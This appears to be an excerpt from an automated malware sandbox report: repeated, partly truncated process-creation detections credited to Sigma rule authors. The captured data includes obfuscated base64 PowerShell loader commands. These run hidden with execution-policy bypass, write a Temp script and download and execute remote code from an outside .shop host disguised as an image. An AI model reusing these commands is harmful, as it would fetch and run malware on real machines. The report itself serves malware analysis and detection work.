                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", CommandLine: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -w 1 "powershell
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFC
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7604, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , ProcessId: 7700, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFC
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7604, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , ProcessId: 7700, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7604, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , ProcessId: 7700, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", CommandLine: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -w 1 "powershell
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 